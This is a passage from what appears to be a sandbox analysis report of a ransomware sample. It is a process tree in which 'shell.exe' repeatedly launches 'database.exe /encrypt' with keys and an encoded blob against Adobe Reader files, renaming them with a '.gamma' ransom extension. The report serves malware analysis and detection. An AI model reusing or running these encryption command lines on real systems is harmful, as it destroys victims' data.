                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3132
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6364
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6396
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3684
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6016
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4768
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6992
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4676
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6580
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6420
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5776
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5880
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3292
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3968
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5400
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
